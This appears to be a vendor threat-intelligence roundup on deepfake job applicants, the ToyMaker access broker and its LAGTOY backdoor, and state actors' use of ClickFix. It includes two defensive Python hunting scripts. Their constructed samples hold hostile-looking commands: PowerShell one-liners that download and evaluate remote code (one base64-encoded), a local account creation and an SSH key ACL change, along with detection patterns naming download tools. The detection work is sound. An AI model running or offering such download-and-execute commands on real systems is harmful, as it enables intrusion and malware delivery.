CTI Roundup: Deepfakes, ToyMaker IAB, and ClickFix
Threat actors use real-time deepfakes to achieve access, ToyMaker IAB works with double extortion gangs, and state-sponsored hackers use the ClickFix social engineering tactic
In this week’s roundup, Tanium’s CTI team examines how North Korean IT workers are reportedly using real-time deepfakes to access organizations. Next up, the team investigates an initial access broker (IAB) known as ToyMaker. Finally, we wrap up with an overview of how several state-sponsored groups are leveraging the ClickFix social engineering tactic to deliver malware.
Threat actors use real-time deepfakes to achieve access
According to a new Palo Alto report, North Korean IT workers are believed to be using real-time deepfake technology to get hired into organizations through remote work positions.
Several reports have come out recently regarding the increase in candidates using real-time deepfakes during job interviews. North Korean threat actors specifically have “consistently demonstrated a significant interest in identity manipulation techniques.”
Just two years ago, Palo Alto reported how North Korean actors were creating synthetic identities with the help of compromised personal information. These North Korean IT workers have continued advancing their tactics, techniques, and procedures (TTPs), and now add real-time deepfake technology to the mix. This lets a single operator interview for the same position multiple times under different deepfake personas, and it makes the operator harder to identify.
How easy is it to create a deepfake identity?
A Palo Alto researcher with no prior image-manipulation experience and only limited deepfake knowledge set out to build a synthetic identity for job interviews. Using a five-year-old computer, they produced a working profile in about 70 minutes, which shows how little skill or budget a threat actor would need to do the same.
To do this, the individual used single images generated by a site called thispersonnotexist[.]org. The site “permits the use of generated faces for personal and commercial purposes, as well as free tools for deepfakes.”
From these images they were able to generate several identities; changing clothes and the background image was enough to make the personas look distinct.
A second attempt with more time, a better GPU, and higher-resolution source images, following the same process, produced even more convincing results.
[Read also: I almost fell for this online scam—Why even tech pros can be taken]
How to spot real-time video deepfakes
Palo Alto pointed out a few shortcomings in deepfake systems that defenders can use to identify fake personas, including:
- Rapid head movements
- Facial artifacts when a hand or other object passes in front of the face (the model reconstructs the occluded region poorly)
- Sudden changes in lighting
- Delays in mouth movement and speech
Analyst comments from Tanium’s Cyber Threat Intelligence team
The researchers at Palo Alto attempted to create real-time deepfakes using only readily available tools and cheap hardware to demonstrate how easy it is for actors to create believable identities. The key takeaway is that creating fake identities is surprisingly easy.
The constant evolution of this threat, coupled with consistent improvements to AI and deepfake technology, makes attacks exceedingly difficult to detect. As Palo Alto notes, close collaboration between HR and security is critical for identifying and protecting against this evolving threat.
It’s important to watch the videos created by Palo Alto in the report to fully understand how convincing these deepfakes can be.
ToyMaker IAB works with double extortion gangs
Cisco Talos shared details of an initial access broker (IAB) named ToyMaker. This financially motivated actor targets vulnerable systems, deploys a custom backdoor called LAGTOY, and attempts to extract credentials.
Cisco Talos observed ToyMaker handing this access over to the Cactus double extortion ransomware gang.
How does ToyMaker work?
Within a week of initial compromise, ToyMaker carried out reconnaissance, credential theft, and backdoor deployment. A lull in activity followed before Cactus entered the picture, using the credentials ToyMaker had stolen.
ToyMaker typically exploits known vulnerabilities to get into an organization and then begins reconnaissance. After a handful of basic discovery commands, the actor starts an SSH listener on the host. The endpoint then receives a connection from another infected host, which results in the creation of a binary named "sftp-server.exe," the SFTP server component of OpenSSH. That binary is then used to fetch the Magnet RAM Capture executable.
Magnet RAM Capture is a free forensics tool normally used to acquire a memory dump from a host. ToyMaker uses it to dump memory and extract credentials from the dump. The actor then deploys its own custom reverse-shell implant, LAGTOY, to maintain persistence on the system.
[Read also: 15 cybersecurity terms you (and your CEO) ought to know by now]
What is the LAGTOY backdoor?
LAGTOY is a simple implant used by ToyMaker and is also tracked as “HOLERUN.”
The backdoor periodically contacts its command-and-control (C2) server for commands to execute on the infected device. It contains anti-debugging checks and is designed to run as a service named "WmiPrvSV," a lookalike of the legitimate WMI Provider Host (WmiPrvSE.exe). The C2 IP address and port are both hardcoded. LAGTOY uses time-based logic to govern its execution, which is believed to be unique to this family.
Cactus and ToyMaker
After receiving access from ToyMaker, Cactus carried out network scans, enumerated endpoints, and cleared its tracks. The credentials ToyMaker had obtained gave Cactus access to several systems, from which it exfiltrated files.
Cactus also used several remote administration tools for access, created reverse shells via OpenSSH, restricted access to the SSH private key file, created new user accounts, ran commands to disable security tools, and used Metasploit-injected binaries.
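The TTPs described above (a service named after the WMI Provider Host, OpenSSH's sftp-server.exe dropped outside its install directory, a memory-acquisition tool, new local accounts, SSH key ACL changes) are all visible in ordinary endpoint telemetry. The following is an added example of a hunt over Sysmon-style events, not Talos, Tanium or ToyMaker code. Every event is constructed; the Magnet RAM Capture file-description string and the drop paths are assumptions, not indicators from the Talos report.

```python
"""
Hunt for the ToyMaker -> Cactus TTPs in Sysmon-style endpoint events.
Added example; not Talos, Tanium or ToyMaker code. All events below are
constructed. The "Magnet RAM Capture" description string and the file
paths are assumptions, not indicators taken from the Talos report.
"""
import re
from collections import defaultdict

# Directories where service binaries and OpenSSH components are expected to live.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample telemetry (one dict per event).
SAMPLE_EVENTS = [
    # LAGTOY installed as a service whose name mimics the WMI Provider Host (WmiPrvSE).
    {"type": "service_install", "host": "srv01", "service_name": "WmiPrvSV",
     "image_path": "C:\\ProgramData\\WmiPrvSV.exe"},
    # Legitimate service install for contrast.
    {"type": "service_install", "host": "srv02", "service_name": "Spooler",
     "image_path": "C:\\Windows\\System32\\spoolsv.exe"},
    # OpenSSH's SFTP server dropped outside its normal install directory.
    {"type": "process_create", "host": "srv01", "image": "C:\\Users\\Public\\sftp-server.exe",
     "description": "OpenSSH sftp-server", "cmdline": "sftp-server.exe"},
    # The same binary from its expected location (benign).
    {"type": "process_create", "host": "srv02",
     "image": "C:\\Windows\\System32\\OpenSSH\\sftp-server.exe",
     "description": "OpenSSH sftp-server", "cmdline": "sftp-server.exe"},
    # Memory-acquisition tool run on a server (description string is an assumption).
    {"type": "process_create", "host": "srv01", "image": "C:\\Users\\Public\\mrc.exe",
     "description": "Magnet RAM Capture", "cmdline": "mrc.exe"},
    # Cactus-style follow-on: new local account and SSH private key ACL tampering.
    {"type": "process_create", "host": "srv01", "image": "C:\\Windows\\System32\\net.exe",
     "description": "Net Command", "cmdline": "net user backupadm Summer2024! /add"},
    {"type": "process_create", "host": "srv01", "image": "C:\\Windows\\System32\\icacls.exe",
     "description": "File ACL utility",
     "cmdline": "icacls C:\\ProgramData\\ssh\\ssh_host_ed25519_key /inheritance:r /grant:r SYSTEM:F"},
]


def in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def check_service_install(ev):
    hits = []
    # The real WMI Provider Host is WmiPrvSE.exe and is not registered as a service,
    # so any service whose name starts with "WmiPrv" is a lookalike worth a look.
    if ev["service_name"].lower().startswith("wmiprv"):
        hits.append("lagtoy_service_lookalike")
    if not in_trusted_dir(ev["image_path"]):
        hits.append("service_from_untrusted_path")
    return hits


def check_process_create(ev):
    hits = []
    image, cmd = ev["image"], ev.get("cmdline", "").lower()
    desc = ev.get("description", "").lower()
    base = basename(image)
    # sftp-server.exe normally lives under System32\OpenSSH; ToyMaker drops it elsewhere.
    if base == "sftp-server.exe" and not in_trusted_dir(image):
        hits.append("sftp_server_outside_openssh_dir")
    if "magnet ram capture" in desc:  # assumed description string
        hits.append("memory_acquisition_tool")
    if base == "net.exe" and re.search(r"\buser\b.*\s/add\b", cmd):
        hits.append("local_account_created")
    if base == "icacls.exe" and re.search(r"\\ssh\\\S*key\b", cmd):
        hits.append("ssh_key_acl_modified")
    return hits


CHECKS = {"service_install": check_service_install, "process_create": check_process_create}


def hunt(events):
    """Return (host, rule) findings, one per triggered rule."""
    findings = []
    for ev in events:
        for rule in CHECKS.get(ev["type"], lambda e: [])(ev):
            findings.append((ev["host"], rule))
    return findings


def chain_hosts(findings, min_rules=3):
    """Hosts where enough distinct rules fired to suggest the full chain, not a lone alert."""
    per_host = defaultdict(set)
    for host, rule in findings:
        per_host[host].add(rule)
    return sorted(h for h, rules in per_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for host, rule in found:
        print(f"{host}: {rule}")
    print("likely ToyMaker chain on:", chain_hosts(found))
```

The per-rule findings are deliberately noisy on their own (an admin can legitimately run icacls or create an account); `chain_hosts` is the part that matters, because the Talos timeline describes several of these steps landing on the same host within a week, and that co-occurrence is what separates the IAB hand-off from routine administration.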
Analyst comments from Tanium’s Cyber Threat Intelligence team
IAB actors can sometimes be overlooked because they do not carry out complex attack chains. Cisco Talos’ analysis and timeline reveal the important role that IABs play in the threat landscape by making it easier for other actors to carry out their plans.
This case is also a reminder of how much basic precautions such as timely vulnerability patching and rotating credentials after a compromise can matter: the lull between ToyMaker's credential theft and Cactus's arrival is exactly the window in which rotation would have cut off the hand-off.
State-sponsored hackers use the ClickFix social engineering tactic
According to Proofpoint, several state-sponsored groups now leverage the ClickFix social engineering tactic to deliver malware. This technique is “replacing the installation and execution stages in existing infection chains” for these actors.
Other recent ClickFix attacks to know about:
- Silk Typhoon, Fake Ransom Notes, and ClickFix
- Vortax Spreads Infostealer Malware, Linux Malware Uses Emojis to Execute Commands
Proofpoint observed several nation-state actors from North Korea, Iran, and Russia using this technique between late 2024 and early 2025.
TA427 aka Kimsuky (North Korea)
Proofpoint observed this North Korean actor, also tracked as Kimsuky, targeting think tank organizations in January and February 2025 with an infection chain built around the ClickFix technique, which the group had not used before.
The group opened by emailing victims and starting a conversation to build trust. The actor then directed the victim to a site that asked them to copy, paste, and run a PowerShell command that, according to the lure, would register their device. Proofpoint notes that one chain never received additional payloads, while a similar instance used a multistage chain of several scripts that ended in QuasarRAT.
TA450 aka MuddyWater (Iran)
In November 2024, Proofpoint observed this actor, also known as MuddyWater, using ClickFix.
The attack began with a phishing email posing as a Microsoft security update. It instructed the victim to open PowerShell with administrator privileges and then copy, paste, and execute a command included in the email.
TA422 and UNK_RemoteRogue (Russia)
In December 2024, Proofpoint observed a Russian actor sending subject-less messages to two organizations from infrastructure that likely consisted of compromised Zimbra servers.
The emails contained a link spoofing Microsoft Office and invited the recipient to visit the site. The site in turn spoofed a Word document and instructed the victim to copy code from it and run it. It went a step further by including a YouTube link showing how to run PowerShell.
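All three campaigns above end the same way: the victim pastes a PowerShell command they did not write. The following is an added example of triaging PowerShell command lines for that pattern, not Proofpoint's or Tanium's code. The sample command lines are constructed (they use the reserved example.invalid domain), and the heuristics are generic traits of pasted one-liners (hidden window, policy bypass, encoded command, download-and-evaluate); they are assumptions, not indicators from the Kimsuky, MuddyWater or TA422/UNK_RemoteRogue chains, which the page does not reproduce.

```python
"""
Triage PowerShell command lines for ClickFix-style "paste this and run it"
payloads. Added example; not Proofpoint's or Tanium's code. Sample command
lines are constructed and the heuristics are generic, assumed traits of
pasted one-liners rather than IOCs from the campaigns described above.
"""
import base64
import re

# Each heuristic is (name, pattern). One hit is weak; two or more is worth a look.
SUSPICIOUS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("bypass_policy", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass\b", re.I)),
    ("remote_download", re.compile(
        r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile|curl|wget)\b",
        re.I)),
    ("inline_eval", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("lolbin_launch", re.compile(r"\b(?:mshta|rundll32|regsvr32|certutil)\b", re.I)),
]
# -e / -enc / -EncodedCommand followed by a base64 blob (PowerShell expects UTF-16LE).
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_for_powershell(script):
    """Encode a script the way -EncodedCommand expects (used here to build a sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Score one command line; the decoded payload (if any) is scanned too."""
    hits = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("encoded_command")
    for text in (cmdline, decoded or ""):
        for name, pattern in SUSPICIOUS:
            if pattern.search(text):
                hits.add(name)
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "hits": sorted(hits),
        "verdict": "clickfix_suspect" if len(hits) >= 2 else "benign_or_unknown",
    }


def suspects(cmdlines):
    """Return only the command lines that triage as ClickFix suspects."""
    return [c for c in cmdlines if triage(c)["verdict"] == "clickfix_suspect"]


# Constructed samples: two pasted-payload shapes and one routine admin command.
SAMPLE_COMMAND_LINES = [
    'powershell -w hidden -ep bypass -c "iex (iwr \'https://example.invalid/verify.txt\' -UseBasicParsing)"',
    "powershell -nop -w hidden -enc " + encode_for_powershell(
        "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"),
    "powershell -NoProfile -Command Get-Service Winmgmt",
]

if __name__ == "__main__":
    for result in map(triage, SAMPLE_COMMAND_LINES):
        print(result["verdict"], result["hits"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Decoding the `-EncodedCommand` blob before scoring is the step that matters most: a pasted ClickFix command frequently hides the download-and-evaluate stage behind base64, so a rule that only looks at the outer command line sees one weak signal instead of three.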
[Read also: Here’s another real-world example of TA422 in action]
Analyst comments from Tanium’s Cyber Threat Intelligence team
The ClickFix technique is now very common among cybercriminal actors, making Proofpoint’s discovery of it being used by nation-state actors quite noteworthy.
It remains to be seen whether more nation-state actors will adopt this technique, but the fact that each of these actors used it only once may indicate a trial period of sorts.
It's also worth noting that ClickFix is becoming more popular with each passing month, making it important to educate users on its telltale signs: a web page or email that tells you to open PowerShell and paste in a command you did not write is the core of the technique, whatever pretext it is wrapped in.
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.